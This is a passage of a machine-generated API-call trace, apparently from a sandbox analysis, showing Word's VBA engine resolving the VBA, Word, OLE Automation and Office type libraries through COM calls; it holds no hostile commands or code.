WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x206000, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0045.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0045.257] IUnknown:AddRef (This=0x7f72450) returned 0x4 [0045.257] IUnknown:Release (This=0x7f72450) returned 0x3 [0045.257] IUnknown:Release (This=0x7f723a0) returned 0x1 [0045.257] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f722f0, ppTypeAttr=0x2063c8, pDummy=0x81f5c40 | out: ppTypeAttr=0x2063c8, pDummy=0x81f5c40*=0x202c0007) returned 0x0 [0045.257] ITypeInfo:LocalReleaseTypeAttr (This=0x7f722f0) returned 0x0 [0045.257] IUnknown:Release (This=0x7f722f0) returned 0x1 [0045.257] CoCreateGuid (in: pguid=0x206580 | out: pguid=0x206580*(Data1=0x87f27ed4, Data2=0x1c5a, Data3=0x4635, Data4=([0]=0x9d, [1]=0x5f, [2]=0x8a, [3]=0xa0, [4]=0xdc, [5]=0xa0, [6]=0x4b, [7]=0xf))) returned 0x0 [0045.257] CoCreateGuid (in: pguid=0x206580 | out: pguid=0x206580*(Data1=0xc9c871d4, Data2=0xb03a, Data3=0x403e, Data4=([0]=0x98, [1]=0xab, [2]=0xad, [3]=0x82, [4]=0x44, [5]=0x7f, [6]=0x4d, [7]=0xd8))) returned 0x0 [0045.257] IMalloc:Alloc (This=0x7feff045380, cb=0x14) returned 0x817acf0 [0045.257] IUnknown:Release (This=0x7f723a0) returned 0x1 [0045.257] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2066b8 | out: ppvObject=0x2066b8*=0x0) returned 0x80004002 [0045.257] IUnknown:Release (This=0x7f72450) returned 0x3 [0045.257] IUnknown:QueryInterface (in: This=0x7f72450, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2066b8 | out: ppvObject=0x2066b8*=0x0) returned 0x80004002 [0045.257] IUnknown:Release (This=0x7f722f0) returned 0x1 [0045.257] IUnknown:QueryInterface (in: This=0x7f722f0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2066b8 | out: ppvObject=0x2066b8*=0x0) returned 0x80004002 [0045.258] IMalloc:Alloc (This=0x7feff045380, cb=0x80) returned 0x811c560 [0045.258] IMalloc:Alloc (This=0x7feff045380, cb=0xb8) returned 0x26ff6d0 [0045.258] IMalloc:Alloc (This=0x7feff045380, cb=0xb8) returned 0x26ff3d0 [0045.258] IMalloc:Alloc (This=0x7feff045380, cb=0x230) returned 0x7fd7070 [0045.258] IMalloc:Alloc (This=0x7feff045380, cb=0x230) returned 0x81d7f70 [0045.258] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2066b8 | out: ppvObject=0x2066b8*=0x0) returned 0x80004002 [0045.258] IUnknown:QueryInterface (in: This=0x7f72450, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2066b8 | out: ppvObject=0x2066b8*=0x0) returned 0x80004002 [0045.258] IUnknown:QueryInterface (in: This=0x7f722f0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2066b8 | out: ppvObject=0x2066b8*=0x0) returned 0x80004002 [0045.258] IMalloc:Alloc (This=0x7feff045380, cb=0x50) returned 0x7f18370 [0045.258] _wcsicmp (_String1="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0 [0045.258] IUnknown:AddRef (This=0x7edf740) returned 0x4 [0045.258] ITypeLib:RemoteGetLibAttr (in: This=0x7edf740, ppTLibAttr=0x205be8, pDummy=0x0 | out: ppTLibAttr=0x205be8, pDummy=0x0) returned 0x0 [0045.258] ITypeLib:RemoteGetDocumentation (in: This=0x7edf740, index=-1, refPtrFlags=0x205c00, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x408928 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x408928) returned 0x0 [0045.258] IMalloc:Realloc (This=0x7feff045380, pv=0x0, cb=0x412) returned 0x3e6ccb0 [0045.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", cchWideChar=66, lpMultiByteStr=0x205c70, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL", lpUsedDefaultChar=0x0) returned 66 [0045.258] strcpy_s (in: _Dst=0x7fd6850, _DstSize=0x43, _Src="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" | out: _Dst="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL") returned 0x0 [0045.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBA", cchWideChar=4, lpMultiByteStr=0x205d80, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBA", lpUsedDefaultChar=0x0) returned 4 [0045.259] strcpy_s (in: _Dst=0x7fd68a0, _DstSize=0x4, _Src="VBA" | out: _Dst="VBA") returned 0x0 [0045.259] IMalloc:Realloc (This=0x7feff045380, pv=0x0, cb=0x412) returned 0x3e6d100 [0045.259] IUnknown:AddRef (This=0x7edf740) returned 0x5 [0045.259] ITypeLib:LocalReleaseTLibAttr (This=0x7edf740) returned 0x0 [0045.259] IUnknown:Release (This=0x7edf740) returned 0x4 [0045.259] _wcsicmp (_String1="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 5 [0045.259] _wcsicmp (_String1="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0 [0045.259] IUnknown:AddRef (This=0x3dd7b80) returned 0xa [0045.259] ITypeLib:RemoteGetLibAttr (in: This=0x3dd7b80, ppTLibAttr=0x205be8, pDummy=0x0 | out: ppTLibAttr=0x205be8, pDummy=0x0) returned 0x0 [0045.259] ITypeLib:RemoteGetDocumentation (in: This=0x3dd7b80, index=-1, refPtrFlags=0x205c00, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0045.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", cchWideChar=58, lpMultiByteStr=0x205c70, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLBVBE7.DLL", lpUsedDefaultChar=0x0) returned 58 [0045.259] strcpy_s (in: _Dst=0x7fd6910, _DstSize=0x3b, _Src="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB" | out: _Dst="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB") returned 0x0 [0045.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=5, lpMultiByteStr=0x205d80, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word", lpUsedDefaultChar=0x0) returned 5 [0045.259] IMalloc:Alloc (This=0x7feff045380, cb=0x230) returned 0x81d81c0 [0045.259] strcpy_s (in: _Dst=0x81d81e8, _DstSize=0x5, _Src="Word" | out: _Dst="Word") returned 0x0 [0045.259] IUnknown:AddRef (This=0x3dd7b80) returned 0xb [0045.260] ITypeLib:LocalReleaseTLibAttr (This=0x3dd7b80) returned 0x0 [0045.260] IUnknown:Release (This=0x3dd7b80) returned 0xa [0045.260] _wcsicmp (_String1="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned -50 [0045.260] _wcsicmp (_String1="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned -5 [0045.260] _wcsicmp (_String1="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", _String2="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 0 [0045.260] IUnknown:AddRef (This=0x7ee0550) returned 0x5 [0045.260] ITypeLib:RemoteGetLibAttr (in: This=0x7ee0550, ppTLibAttr=0x205be8, pDummy=0x0 | out: ppTLibAttr=0x205be8, pDummy=0x0) returned 0x0 [0045.260] ITypeLib:RemoteGetDocumentation (in: This=0x7ee0550, index=-1, refPtrFlags=0x205c00, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0045.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\stdole2.tlb#OLE Automation", cchWideChar=31, lpMultiByteStr=0x205c70, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\stdole2.tlbce\\Root\\Office16\\MSWORD.OLB", lpUsedDefaultChar=0x0) returned 31 [0045.261] strcpy_s (in: _Dst=0x81d8258, _DstSize=0x20, _Src="C:\\Windows\\system32\\stdole2.tlb" | out: _Dst="C:\\Windows\\system32\\stdole2.tlb") returned 0x0 [0045.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=7, lpMultiByteStr=0x205d80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="stdole", lpUsedDefaultChar=0x0) returned 7 [0045.261] strcpy_s (in: _Dst=0x81d8280, _DstSize=0x7, _Src="stdole" | out: _Dst="stdole") returned 0x0 [0045.261] IUnknown:AddRef (This=0x7ee0550) returned 0x6 [0045.261] ITypeLib:LocalReleaseTLibAttr (This=0x7ee0550) returned 0x0 [0045.261] IUnknown:Release (This=0x7ee0550) returned 0x5 [0045.261] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 2 [0045.261] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 2 [0045.261] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 2 [0045.262] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0 [0045.262] IUnknown:AddRef (This=0x7edffb0) returned 0x3 [0045.262] ITypeLib:RemoteGetLibAttr (in: This=0x7edffb0, ppTLibAttr=0x205be8, pDummy=0x0 | out: ppTLibAttr=0x205be8, pDummy=0x0) returned 0x0 [0045.262] ITypeLib:RemoteGetDocumentation (in: This=0x7edffb0, index=-1, refPtrFlags=0x205c00, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0045.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", cchWideChar=63, lpMultiByteStr=0x205c70, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLLDLL", lpUsedDefaultChar=0x0) returned 63 [0045.262] strcpy_s (in: _Dst=0x81d82f0, _DstSize=0x40, _Src="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Dst="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0045.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=7, lpMultiByteStr=0x205d80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office", lpUsedDefaultChar=0x0) returned 7 [0045.262] strcpy_s (in: _Dst=0x81d8338, _DstSize=0x7, _Src="Office" | out: _Dst="Office") returned 0x0 [0045.262] IUnknown:AddRef (This=0x7edffb0) returned 0x4 [0045.262] ITypeLib:LocalReleaseTLibAttr (This=0x7edffb0) returned 0x0 [0045.262] IUnknown:Release (This=0x7edffb0) returned 0x3 [0045.262] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205830 | out: ppvObject=0x205830*=0x0) returned 0x80004002 [0045.262] IUnknown:AddRef (This=0x7f723a0) returned 0x3 [0045.262] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x205848, pDummy=0x10 | out: ppTypeAttr=0x205848, pDummy=0x10) returned 0x0 [0045.262] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0045.262] IUnknown:Release (This=0x7f723a0) returned 0x2 [0045.262] IUnknown:Release (This=0x7f723a0) returned 0x1 [0045.262] IMalloc:Alloc (This=0x7feff045380, cb=0x118) returned 0x7f43d60 [0045.263] IMalloc:Alloc (This=0x7feff045380, cb=0x230) returned 0x81d8410 [0045.263] IMalloc:Alloc (This=0x7feff045380, cb=0xe28) returned 0x81e23b0 [0045.263] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72450, ppTypeAttr=0x205828, pDummy=0x205864 | out: ppTypeAttr=0x205828, pDummy=0x205864*=0xffffffff) returned 0x0 [0045.263] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0x0, ppFuncDesc=0x205820, pDummy=0x205868 | out: ppFuncDesc=0x205820, pDummy=0x205868*=0x7f72450) returned 0x0 [0045.263] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.263] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0x1, ppFuncDesc=0x205820, pDummy=0x100 | out: ppFuncDesc=0x205820, pDummy=0x100) returned 0x0 [0045.263] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.263] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0x2, ppFuncDesc=0x205820, pDummy=0x100 | out: ppFuncDesc=0x205820, pDummy=0x100) returned 0x0 [0045.263] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.263] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0x3, ppFuncDesc=0x205820, pDummy=0x100 | out: ppFuncDesc=0x205820, pDummy=0x100) returned 0x0 [0045.263] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.263] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0x4, ppFuncDesc=0x205820, pDummy=0x100 | out: ppFuncDesc=0x205820, pDummy=0x100) returned 0x0 [0045.263] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.263] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0x5, ppFuncDesc=0x205820, pDummy=0x100 | out: ppFuncDesc=0x205820, pDummy=0x100) returned 0x0 [0045.263] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.263] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0x6, ppFuncDesc=0x205820, pDummy=0x100 | out: ppFuncDesc=0x205820, pDummy=0x100) returned 0x0 [0045.263] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.263] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0x7, ppFuncDesc=0x205820, pDummy=0x100 | out: ppFuncDesc=0x205820, pDummy=0x100) returned 0x0 [0045.263] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.263] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0x8, ppFuncDesc=0x205820, pDummy=0x100 | out: ppFuncDesc=0x205820, pDummy=0x100) returned 0x0 [0045.263] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.263] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0x9, ppFuncDesc=0x205820, pDummy=0x100 | out: ppFuncDesc=0x205820, pDummy=0x100) returned 0x0 [0045.263] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.263] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0xa, ppFuncDesc=0x205820, pDummy=0x100 | out: ppFuncDesc=0x205820, pDummy=0x100) returned 0x0 [0045.263] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.263] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0xb, ppFuncDesc=0x205820, pDummy=0x100 | out: ppFuncDesc=0x205820, pDummy=0x100) returned 0x0 [0045.263] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.263] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0xc, ppFuncDesc=0x205820, pDummy=0x100 | out: ppFuncDesc=0x205820, pDummy=0x100) returned 0x0 [0045.263] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.263] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72450) returned 0x0 [0045.263] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72450, ppTypeAttr=0x205828, pDummy=0x205864 | out: ppTypeAttr=0x205828, pDummy=0x205864*=0xffffffff) returned 0x0 [0045.264] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0x0, ppFuncDesc=0x205820, pDummy=0x90 | out: ppFuncDesc=0x205820, pDummy=0x90) returned 0x0 [0045.264] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.264] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0x1, ppFuncDesc=0x205820, pDummy=0x90 | out: ppFuncDesc=0x205820, pDummy=0x90) returned 0x0 [0045.264] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.264] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0x2, ppFuncDesc=0x205820, pDummy=0x90 | out: ppFuncDesc=0x205820, pDummy=0x90) returned 0x0 [0045.264] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.264] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0x3, ppFuncDesc=0x205820, pDummy=0x90 | out: ppFuncDesc=0x205820, pDummy=0x90) returned 0x0 [0045.264] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.264] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0x4, ppFuncDesc=0x205820, pDummy=0x90 | out: ppFuncDesc=0x205820, pDummy=0x90) returned 0x0 [0045.264] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.264] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0x5, ppFuncDesc=0x205820, pDummy=0x90 | out: ppFuncDesc=0x205820, pDummy=0x90) returned 0x0 [0045.264] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.264] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0x6, ppFuncDesc=0x205820, pDummy=0x90 | out: ppFuncDesc=0x205820, pDummy=0x90) returned 0x0 [0045.264] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.264] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0x7, ppFuncDesc=0x205820, pDummy=0x90 | out: ppFuncDesc=0x205820, pDummy=0x90) returned 0x0 [0045.264] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.264] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0x8, ppFuncDesc=0x205820, pDummy=0x90 | out: ppFuncDesc=0x205820, pDummy=0x90) returned 0x0 [0045.264] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.264] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0x9, ppFuncDesc=0x205820, pDummy=0x90 | out: ppFuncDesc=0x205820, pDummy=0x90) returned 0x0 [0045.264] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.264] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0xa, ppFuncDesc=0x205820, pDummy=0x90 | out: ppFuncDesc=0x205820, pDummy=0x90) returned 0x0 [0045.264] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.264] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0xb, ppFuncDesc=0x205820, pDummy=0x90 | out: ppFuncDesc=0x205820, pDummy=0x90) returned 0x0 [0045.264] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.264] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f72450, index=0xc, ppFuncDesc=0x205820, pDummy=0x90 | out: ppFuncDesc=0x205820, pDummy=0x90) returned 0x0 [0045.264] ITypeInfo:LocalReleaseFuncDesc (This=0x7f72450) returned 0x0 [0045.264] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72450) returned 0x4a02320001 [0045.264] IUnknown:Release (This=0x7f72450) returned 0x3 [0045.264] IMalloc:Alloc (This=0x7feff045380, cb=0x10) returned 0x8179450 [0045.264] IMalloc:Alloc (This=0x7feff045380, cb=0x10) returned 0x817a5f0 [0045.264] IMalloc:Alloc (This=0x7feff045380, cb=0x10) returned 0x817bc10 [0045.265] IUnknown:QueryInterface (in: This=0x7f72450, riid=0x7fee4040b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205128 | out: ppvObject=0x205128*=0x0) returned 0x80004002 [0045.265] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72450, ppTypeAttr=0x205120, pDummy=0x10 | out: ppTypeAttr=0x205120, pDummy=0x10) returned 0x0 [0045.269] IUnknown:QueryInterface (in: This=0x7f72450, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2050a8 | out: ppvObject=0x2050a8*=0x0) returned 0x80004002 [0045.269] IUnknown:AddRef (This=0x7f72450) returned 0x4 [0045.269] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72450, ppTypeAttr=0x2050a0, pDummy=0x10 | out: ppTypeAttr=0x2050a0, pDummy=0x10) returned 0x0 [0045.269] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72450) returned 0x0 [0045.269] IUnknown:Release (This=0x7f72450) returned 0x3 [0045.269] strcpy_s (in: _Dst=0x81d8468, _DstSize=0x9, _Src="Document" | out: _Dst="Document") returned 0x0 [0045.269] IMalloc:Alloc (This=0x7feff045380, cb=0xc8) returned 0x8134670 [0045.269] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72450, ppTypeAttr=0x205060, pDummy=0x7f72450 | out: ppTypeAttr=0x205060, pDummy=0x7f72450*=0xff4207b0) returned 0x0 [0045.269] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x7f72450, ppTLib=0x205068, pIndex=0x2050a8 | out: ppTLib=0x205068*=0x3dd7b80, pIndex=0x2050a8*=0x20e) returned 0x0 [0045.270] ITypeLib:RemoteGetLibAttr (in: This=0x3dd7b80, ppTLibAttr=0x204d58, pDummy=0x0 | out: ppTLibAttr=0x204d58, pDummy=0x0) returned 0x0 [0045.270] ITypeLib:RemoteGetDocumentation (in: This=0x3dd7b80, index=-1, refPtrFlags=0x204d70, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x776f5410 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x776f5410*="\x8948\x245c\x4808\x7489\x1024\x4857\xec83\x4920\xd98b\xf41\xf8b7\xfa83\x7401\x7658\x8364\x3fa\xa76\xfa83\x7604\x835a\x6fa\x5577\xf633\x3b48\x74de\x4d4e\x418d\xf10\xd7b7\xc933\x3345\xe8c9\x44cc\xfff4\xf44\xdfb7\x8948\x873\x894c\x661b\xfe3b\x2d74\x8d4a\xdb4c\xb810\xffff") returned 0x0 [0045.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", cchWideChar=58, lpMultiByteStr=0x204de0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB\x8eðþ\x07", lpUsedDefaultChar=0x0) returned 58 [0045.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=5, 